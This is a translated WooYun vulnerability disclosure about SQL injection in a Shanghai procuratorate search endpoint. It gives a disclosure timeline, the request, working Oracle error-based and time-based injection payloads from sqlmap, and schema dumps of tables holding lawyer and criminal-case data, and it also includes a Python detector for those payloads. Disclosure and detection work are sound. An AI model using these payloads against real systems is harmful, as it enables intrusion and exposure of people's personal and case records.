POST injection in a Shanghai procuratorate endpoint exposes details of 11W (110,000) criminal cases and lawyers

admin | 2017-04-16 20:03:54 | 351 views | 247 characters | 0 min 49 s read
Summary

2016-02-26: Details reported to the vendor; awaiting vendor handling
2016-03-01: Vendor has confirmed; details disclosed to the vendor only
2016-03-11: Details disclosed to core white hats and relevant domain experts
2016-03-21: Details disclosed to regular white hats
2016-03-31: Details disclosed to intern white hats
2016-04-15: Details disclosed to the public

Vulnerability overview (13 followers)

Defect ID: WooYun-2016-178723

Title: POST injection in a Shanghai procuratorate endpoint exposes details of 11W (110,000) criminal cases and lawyers

Affected vendor: Shanghai Municipal People's Procuratorate

Author: 路人甲

Submitted: 2016-02-26 11:03

Published: 2016-04-15 13:14

Vulnerability type: SQL injection

Severity: High

Self-assessed Rank: 14

Status: Handed over to a third-party partner organisation (CNCERT, National Internet Emergency Center) for handling

Source: www.wooyun.org

Tags: injection techniques



Vulnerability details

Brief description:

As the title says...

Details:

http://**.**.**.**:81/wcm/searchapply/searchapply_search_wd_dowith.jsp POST injection vulnerability

A SQL injection vulnerability at the Shanghai Municipal People's Procuratorate; it allows reading lawyer records (T_LAWYER: 17791) and offender/criminal case records (XWCMCASE: 113918).

Code area
POST /wcm/searchapply/searchapply_search_wd_dowith.jsp HTTP/1.1
Host: **.**.**.**:81
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:44.0) Gecko/20100101 Firefox/44.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://**.**.**.**:81/wcm/searchapply/searchapply_search_wd_dowith.jsp
Cookie: JSESSIONID=E590421FF9781B5A857DF05974734F60; clientlanguage=zh_CN; JWGKCMSSession=0F4BB32C69CEE2B2C7BDBC7333737671; _gscu_1687458965=56408206xi61sd14; _gscbrs_1687458965=1; _gscs_1687458965=t56411810d4db8151|pv:1; JSESSIONID=89BEBFD1A35D94AF351596499CDA643E
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 34

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: POST
Parameter: searchPass
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: lawyerCardNum=adsa&searchPass=adds' AND 5276=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(115)||CHR(120)||CHR(58)||(SELECT (CASE WHEN (5276=5276) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(106)||CHR(106)||CHR(98)||CHR(58)||CHR(62))) FROM DUAL) AND 'rVlH'='rVlH

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: lawyerCardNum=adsa&searchPass=adds' AND 4311=DBMS_PIPE.RECEIVE_MESSAGE(CHR(107)||CHR(84)||CHR(113)||CHR(111),5) AND 'kxQe'='kxQe

Place: POST
Parameter: lawyerCardNum
Type: error-based
Title: Oracle AND error-based - WHERE or HAVING clause (XMLType)
Payload: lawyerCardNum=adsa' AND 5149=(SELECT UPPER(XMLType(CHR(60)||CHR(58)||CHR(111)||CHR(115)||CHR(120)||CHR(58)||(SELECT (CASE WHEN (5149=5149) THEN 1 ELSE 0 END) FROM DUAL)||CHR(58)||CHR(106)||CHR(106)||CHR(98)||CHR(58)||CHR(62))) FROM DUAL) AND 'FtNJ'='FtNJ&searchPass=adds

Type: AND/OR time-based blind
Title: Oracle AND time-based blind
Payload: lawyerCardNum=adsa' AND 8812=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(88)||CHR(102)||CHR(101),5) AND 'iwaJ'='iwaJ&searchPass=adds
---
back-end DBMS: Oracle

available databases [31]:
[*] CTXSYS
[*] HR
[*] MDSYS
[*] ODM
[*] ODM_MTR
[*] OE
[*] OLAPSYS
[*] ORDSYS
[*] OUTLN
[*] PM
[*] QS
[*] QS_CBADM
[*] QS_CS
[*] QS_ES
[*] QS_OS
[*] QS_WS
[*] RMAN
[*] SCOTT
[*] SH
[*] SHJCYWCM
[*] SYS
[*] SYSTEM
[*] TRSMAS
[*] TRSTEST
[*] TRSWCM
[*] TRSWCMDB
[*] TRSWCMV7
[*] WCMPLUS
[*] WKSYS
[*] WMSYS
[*] XDB

current user: 'SHJCYWCM'

current schema (equivalent to database on Oracle): 'SHJCYWCM'
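As an added defender-side example (not code from the original report or from the affected site), the following Python flags the two Oracle payload families from the sqlmap output above in a form body and checks the endpoint's two parameters against the allowlist they should have enforced server-side; the sample bodies, the alphanumeric field allowlist and the 32-character limit are assumptions.

```python
import re
from urllib.parse import parse_qs

# Oracle-specific signatures from the sqlmap output above: error-based injection
# through XMLType() and time-based injection through DBMS_PIPE.RECEIVE_MESSAGE(),
# plus the CHR()||... and 'x'='x scaffolding that wraps them.
SIGNATURES = {
    "oracle_xmltype_error": re.compile(r"XMLType\s*\(", re.I),
    "oracle_dbms_pipe_delay": re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE\s*\(", re.I),
    "chr_concat": re.compile(r"CHR\s*\(\s*\d+\s*\)\s*\|\|", re.I),
    "quote_tautology": re.compile(r"'([^']+)'\s*=\s*'\1"),
}

# Allowlist the two form fields should have enforced server-side (assumption: a
# lawyer card number and the search passcode are short alphanumeric tokens).
PARAM_RULES = {name: re.compile(r"[A-Za-z0-9]{1,32}") for name in ("lawyerCardNum", "searchPass")}

def scan_body(body: str) -> dict:
    """Map each suspicious form field to the signature names it triggered."""
    hits = {}
    for name, values in parse_qs(body, keep_blank_values=True).items():
        for value in values:
            matched = [sig for sig, rx in SIGNATURES.items() if rx.search(value)]
            rule = PARAM_RULES.get(name)
            if rule and not rule.fullmatch(value):
                matched.append("fails_allowlist")
            if matched:
                hits.setdefault(name, []).extend(matched)
    return hits

# Constructed sample bodies (not captured traffic) mirroring the benign request
# and the two sqlmap payload families shown on this page.
SAMPLE_BODIES = [
    "lawyerCardNum=adsa&searchPass=adds",
    "lawyerCardNum=adsa&searchPass=adds' AND 5276=(SELECT UPPER(XMLType("
    "CHR(60)||CHR(58)||CHR(62))) FROM DUAL) AND 'rVlH'='rVlH",
    "lawyerCardNum=adsa' AND 8812=DBMS_PIPE.RECEIVE_MESSAGE(CHR(113)||CHR(88),5)"
    " AND 'iwaJ'='iwaJ&searchPass=adds",
]

def scan_samples(bodies=SAMPLE_BODIES) -> list:
    """Scan every sample body; an empty dict means the request looked clean."""
    return [scan_body(b) for b in bodies]

if __name__ == "__main__":
    for body, result in zip(SAMPLE_BODIES, scan_samples()):
        print(result or "clean", "<-", body[:60])
```

Signature matching only recognises the shapes shown here; the durable fix is a parameterised query in the JSP, and any scanner must URL-decode before matching (parse_qs does that here).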

Proof of vulnerability:

Code area
Database: SHJCYWCM
[217 tables]
+-------------------------------+
| CMS_ARTICLE |
| CMS_ARTICLE_DATA |
| CMS_CATEGORY |
| CMS_COMMENT |
| CMS_GUESTBOOK |
| CMS_LINK |
| CMS_SITE |
| SYS_AREA |
| SYS_DICT |
| SYS_LOG |
| SYS_MDICT |
| SYS_MENU |
| SYS_OFFICE |
| SYS_ROLE |
| SYS_ROLE_MENU |
| SYS_ROLE_OFFICE |
| SYS_USER |
| SYS_USER_ROLE |
| TABS |
| T_LAWFORM |
| T_LAWYER |
| WCMADDRESS |
| WCMADDRGROUP |
| WCMADDRGRPMAP |
| WCMAPPENDIX |
| WCMAUTOBAKCONFIG |
| WCMBOOKMARK |
| WCMBULLETIN |
| WCMCHANNEL |
| WCMCHANNELCHILDINDEXQUOTE |
| WCMCHANNELCONTENTLINK |
| WCMCHANNELSYN |
| WCMCHNLDOC |
| WCMCHNLEXTFIELD |
| WCMCHNLFLOW |
| WCMCHNLTEMP |
| WCMCLUSTERLOCK |
| WCMCONDITIONBEAN |
| WCMCONFIG |
| WCMCONTACT |
| WCMCONTENTEXTFIELD |
| WCMCONTENTLINK |
| WCMCONTENTLINKTYPE |
| WCMCONTGROUP |
| WCMCONTGRPMAP |
| WCMDBUPDATE |
| WCMDBUPDATELOG |
| WCMDOCBAK |
| WCMDOCKEYWORD |
| WCMDOCKIND |
| WCMDOCQUOTEIMAGE |
| WCMDOCREPLY |
| WCMDOCSOURCE_STAT_NEW |
| WCMDOCSYN |
| WCMDOCTYPE |
| WCMDOCUMENT |
| WCMENUMVALUE |
| WCMEVENT |
| WCMEVENTSHARE |
| WCMEVENTTYPE |
| WCMEXPIRATION |
| WCMEXTFIELD |
| WCMFILETYPE |
| WCMFLOW |
| WCMFLOWACTION |
| WCMFLOWBRANCH |
| WCMFLOWCONTENTCONFIG |
| WCMFLOWDOC |
| WCMFLOWDOCBAK |
| WCMFLOWEMPLOY |
| WCMFLOWEVENTCONDITION |
| WCMFLOWEVENTOPERATE |
| WCMFLOWMONOPER |
| WCMFLOWNODE |
| WCMFLOWNODEEVENT |
| WCMFLOWNODEOPER |
| WCMFOLDERPUBLISHCONFIG |
| WCMFOLDERPUBLISHINFO |
| WCMFORMFIELDS |
| WCMFORMINFO |
| WCMGROUP |
| WCMGRPROLE |
| WCMGRPUSER |
| WCMHELP |
| WCMHITSCOUNT |
| WCMID |
| WCMINFOVIEW |
| WCMINFOVIEWEMPLOY |
| WCMINFOVIEWFIELD |
| WCMINFOVIEWGROUP |
| WCMINFOVIEWSERIAL |
| WCMINFOVIEWVIEW |
| WCMJOB |
| WCMJOBEXERESULT |
| WCMLOG |
| WCMLOGBAK |
| WCMLOGTYPE |
| WCMMARKKIND |
| WCMMARKSHARE |
| WCMMEETINGCONT |
| WCMMEETINGROOM |
| WCMMEETINGUSER |
| WCMMESSAGE |
| WCMMSGQUEUE |
| WCMMSGRECEIVER |
| WCMOBJTRIGGER |
| WCMOPER |
| WCMOPERATIONBEAN |
| WCMOPERTYPE |
| WCMPUBLISHCONFIG |
| WCMPUBLISHDISTRIBUTION |
| WCMPUBLISHERRORLOG |
| WCMPUBLISHTASK |
| WCMPUBSTATUSCONFIG |
| WCMRECENT |
| WCMRELATION |
| WCMREPLACE |
| WCMRIGHT |
| WCMRIGHTDEF |
| WCMROLE |
| WCMROLEUSER |
| WCMSCHEDULE |
| WCMSECUREKEY |
| WCMSECURITY |
| WCMSITEEXTFIELD |
| WCMSITEUSER |
| WCMSOURCE |
| WCMSTATFIELDMAP |
| WCMSTATHOST |
| WCMSTATUS |
| WCMSTATVIEW |
| WCMSTATVIEWREL |
| WCMSTAT_CHANNEL_GENERAL |
| WCMSTAT_CHANNEL_TEMPLATE |
| WCMSTAT_DOCSOURCE_PUBALL |
| WCMSTAT_GROUP_GENERAL |
| WCMSTAT_SITE_GENERAL |
| WCMSTAT_USER_GENERAL |
| WCMSTAT_WFAPPLY_GROUP_GENERAL |
| WCMSTAT_WFAPPLY_USER_GENERAL |
| WCMSTAT_WORKFLOW_GROUP |
| WCMSTAT_WORKFLOW_USER |
| WCMTAGBEANS |
| WCMTASK |
| WCMTASKPOOL |
| WCMTEMPAPDREL |
| WCMTEMPAPPENDIX |
| WCMTEMPLATE |
| WCMTEMPLATEARGUMENT |
| WCMTEMPLATEEMPLOY |
| WCMTEMPLATENEST |
| WCMTEMPLATEQUOTE |
| WCMTRUSTEEINFO |
| WCMUSER |
| WCMUSERSETTING |
| WCMWEBSITE |
| XWCMAPPLYFORM |
| XWCMAPPLYFORMDEALLOG |
| XWCMAPPOPERATELOGS |
| XWCMBLACKLIST |
| XWCMCASE |
| XWCMCASEBAK |
| XWCMCASELOG |
| XWCMCELLINFO |
| XWCMCLASSINFO |
| XWCMCLASSINFOVIEW |
| XWCMCOMPLEXFIELDDATA |
| XWCMCONTENTSTYLE |
| XWCMCUSTOMSITECHECKEDINFO |
| XWCMDBFIELDINFO |
| XWCMDOCUMENTTOPIC |
| XWCMENTRYCONFIG |
| XWCMEXPORTLOG |
| XWCMFCKVIDEO |
| XWCMFLOWACTION |
| XWCMFLOWCONDITION |
| XWCMFLOWDOCLOG |
| XWCMFLOWNODEFIELD |
| XWCMFLOWRULE |
| XWCMHOLIDAY |
| XWCMHTTPLOG |
| XWCMINDIVIDUATION |
| XWCMKEYWORD |
| XWCMLAWAPPENDIX |
| XWCMLAWUSER |
| XWCMLAWYER |
| XWCMLAWYERAPPLY |
| XWCMLAWYERAPPLYBAK |
| XWCMLEAMASSGE |
| XWCMLOGO |
| XWCMMAILCONFIG |
| XWCMMAILSMSOPERATELOGS |
| XWCMMAILSMSTEMPLATE |
| XWCMMASTER |
| XWCMMESSAGELOGS |
| XWCMMETADATA |
| XWCMMETAVIEWEMPLOYER |
| XWCMOBJECTMEMBER |
| XWCMPAGEOPERATOR |
| XWCMPAGESTYLE |
| XWCMREGIONEMPLOY |
| XWCMREGIONINFO |
| XWCMRESOURCEBLOCK |
| XWCMRESOURCESTYLE |
| XWCMSEARCHAPPLY |
| XWCMSTYLEITEM |
| XWCMTABLEINFO |
| XWCMTOPICEDDOCRELATION |
| XWCMVIDEO_SP2 |
| XWCMVIEWFIELDINFO |
| XWCMVIEWINFO |
| XWCMVIEWOTHERTABLES |
| XWCMWATERMARK |
| XWCMWIDGET |
| XWCMWIDGETINSTANCE |
| XWCMWIDGETINSTPARAMETER |
| XWCMWIDGETPARAMETER |
+-------------------------------+


Database: SHJCYWCM
+--------------------------+---------+
| Table | Entries |
+--------------------------+---------+
| XWCMHTTPLOG | 9471867 |
| WCMLOG | 202760 |
| XWCMMESSAGELOGS | 134021 |
| XWCMCASE | 113918 |
| XWCMAPPOPERATELOGS | 81920 |
| XWCMCASEBAK | 56518 |
| XWCMLAWAPPENDIX | 25227 |
| WCMCHNLDOC | 22218 |
| WCMDOCUMENT | 22070 |
| XWCMSEARCHAPPLY | 21902 |
| XWCMLAWYERAPPLY | 21659 |
| XWCMMAILSMSOPERATELOGS | 18075 |
| T_LAWYER | 17791 |
| XWCMLAWYER | 17791 |
| WCMSTAT_CHANNEL_GENERAL | 7865 |
| WCMSTAT_USER_GENERAL | 7621 |
| WCMAPPENDIX | 4560 |
| WCMSTAT_SITE_GENERAL | 1940 |
| WCMSTAT_GROUP_GENERAL | 1769 |
| XWCMCASELOG | 1421 |
| T_LAWFORM | 1407 |
| WCMSTAT_DOCSOURCE_PUBALL | 1221 |
| XWCMOBJECTMEMBER | 1013 |
| WCMRIGHT | 971 |
| WCMTEMPAPDREL | 575 |
| WCMTEMPLATEEMPLOY | 486 |
| WCMTEMPAPPENDIX | 409 |
| WCMMESSAGE | 373 |
| WCMMSGRECEIVER | 373 |
| XWCMEXPORTLOG | 308 |
| WCMFOLDERPUBLISHCONFIG | 271 |
| WCMCHANNEL | 266 |
| WCMTEMPLATEQUOTE | 193 |
| WCMUSER | 187 |
| WCMHELP | 172 |
| SYS_LOG | 140 |
| WCMSTATFIELDMAP | 140 |
| WCMCONFIG | 128 |
| WCMUSERSETTING | 124 |
| WCMOPERTYPE | 116 |
| WCMGRPUSER | 115 |
| WCMGRPROLE | 105 |
| WCMID | 104 |
| WCMRIGHTDEF | 92 |
| WCMTAGBEANS | 92 |
| XWCMLEAMASSGE | 92 |
| XWCMHOLIDAY | 86 |
| SYS_MENU | 79 |
| WCMROLEUSER | 73 |
| SYS_ROLE_MENU | 66 |
| WCMDOCSOURCE_STAT_NEW | 66 |
| WCMTEMPLATE | 66 |
| SYS_DICT | 63 |
| WCMSITEUSER | 53 |
| WCMSTATVIEW | 45 |
| WCMTEMPLATENEST | 41 |
| WCMSTATVIEWREL | 33 |
| SYS_OFFICE | 26 |
| WCMGROUP | 25 |
| XWCMINDIVIDUATION | 24 |
| SYS_ROLE_OFFICE | 22 |
| WCMDOCKEYWORD | 20 |
| WCMROLE | 20 |
| WCMREPLACE | 19 |
| WCMOPER | 15 |
| SYS_AREA | 14 |
| WCMSCHEDULE | 11 |
| WCMDBUPDATE | 10 |
| WCMEVENTTYPE | 10 |
| WCMSTATHOST | 9 |
| WCMSTATUS | 9 |
| WCMJOBEXERESULT | 8 |
| WCMMSGQUEUE | 8 |
| WCMPUBSTATUSCONFIG | 8 |
| WCMRELATION | 8 |
| WCMSOURCE | 8 |
| WCMWEBSITE | 8 |
| WCMLOGTYPE | 7 |
| XWCMENTRYCONFIG | 7 |
| WCMCONDITIONBEAN | 6 |
| XWCMMAILSMSTEMPLATE | 6 |
| WCMOPERATIONBEAN | 5 |
| WCMENUMVALUE | 4 |
| WCMFLOWNODE | 4 |
| WCMPUBLISHDISTRIBUTION | 4 |
| XWCMFLOWDOCLOG | 4 |
| WCMFLOWBRANCH | 3 |
| WCMSECURITY | 3 |
| SYS_USER | 2 |
| SYS_USER_ROLE | 2 |
| WCMEXTFIELD | 2 |
| WCMFLOWDOC | 2 |
| WCMFLOWNODEOPER | 2 |
| XWCMBLACKLIST | 2 |
| XWCMFLOWACTION | 2 |
| XWCMFLOWCONDITION | 2 |
| SYS_ROLE | 1 |
| TABS | 1 |
| WCMDOCBAK | 1 |
| WCMFLOW | 1 |
| WCMFLOWEMPLOY | 1 |
| WCMSTAT_WORKFLOW_GROUP | 1 |
| WCMSTAT_WORKFLOW_USER | 1 |
| XWCMFLOWRULE | 1 |
| XWCMLAWUSER | 1 |
| XWCMLOGO | 1 |
+--------------------------+---------+


Database: SHJCYWCM
Table: T_LAWYER
[21 columns]
+----------------+----------+
| Column | Type |
+----------------+----------+
| ADDRESS | VARCHAR2 |
| ASSESSMENT | VARCHAR2 |
| EDUCATION | VARCHAR2 |
| EMAIL | VARCHAR2 |
| FAX | VARCHAR2 |
| GENDER | VARCHAR2 |
| IDNUMBER | VARCHAR2 |
| LAWFIRMID | VARCHAR2 |
| LAWYERID | VARCHAR2 |
| LICENSENUMBER | VARCHAR2 |
| MEMBERNUMBER | VARCHAR2 |
| MOBILE | VARCHAR2 |
| NAME | VARCHAR2 |
| NATION | VARCHAR2 |
| PARTNER | VARCHAR2 |
| PERSONID | VARCHAR2 |
| PHONE | VARCHAR2 |
| POLITIC | VARCHAR2 |
| PORTRAIT | VARCHAR2 |
| PRACTICESTATUS | VARCHAR2 |
| PRACTICETYPE | VARCHAR2 |
+----------------+----------+

Database: SHJCYWCM
Table: XWCMCASE
[18 columns]
+-------------------+----------+
| Column | Type |
+-------------------+----------+
| ACCEPTDATE | VARCHAR2 |
| APPROVEDATE | VARCHAR2 |
| CASEACCEPCTNUM | VARCHAR2 |
| CASEACCEPCTNUM1 | VARCHAR2 |
| CASEACCEPCTNUM2 | VARCHAR2 |
| CASEBRIEF | VARCHAR2 |
| CASEID | VARCHAR2 |
| CASENAME | VARCHAR2 |
| CASESTAGE | VARCHAR2 |
| CRTIME | DATE |
| GROUPID | NUMBER |
| GROUPNAME | VARCHAR2 |
| ID | NUMBER |
| PERSONID | VARCHAR2 |
| PERSONNAME | VARCHAR2 |
| RELATIONCASEIDS | VARCHAR2 |
| RELATIONIDS | CLOB |
| RELATIONPERSONIDS | VARCHAR2 |
+-------------------+----------+

Remediation:

Just fix it...

Copyright notice: when reposting, please credit the source, 路人甲@乌云


Vulnerability response

Vendor response:

Severity: High

Vulnerability Rank: 10

Confirmed: 2016-03-01 13:14

Vendor reply:

CNVD confirmed the described situation; it has been forwarded via CNCERT to the Shanghai branch center, which will coordinate handling with the website's administering unit.

Latest status:

None yet



Comments

  1. 2016-02-26 11:44 | 骑虎打狗 ( Passerby | Rank:19 Vulns:9 | I'm Chinese-style, you know..)

    1

    Sure enough, you erased your rape charge?

  2. 2016-02-26 11:52 | 蝶离飞 ( Intern white hat | Rank:42 Vulns:15 | poor kid)

    1

    Sure enough, you erased your plunder charge?

  3. 2016-02-26 12:02 | 库日天 ( Passerby | Rank:18 Vulns:9 )

    1

    Sure enough, you erased your plunder charge?

  4. 2016-02-26 12:46 | 小龙 ( Regular white hat | Rank:2794 Vulns:546 | I'm asking, who else!!!!!!!!!!!!!...)

    1

    Sure enough, you erased your rape charge?

  5. 2016-02-26 13:18 | 田老板 ( Passerby | Rank:30 Vulns:13 | school killer)

    1

    Sigh, nothing more to say

  6. 2016-03-01 14:46 | SH0X8001 ( Passerby | Rank:25 Vulns:6 | guess)

    1

    Sure enough, you erased your rape charge?
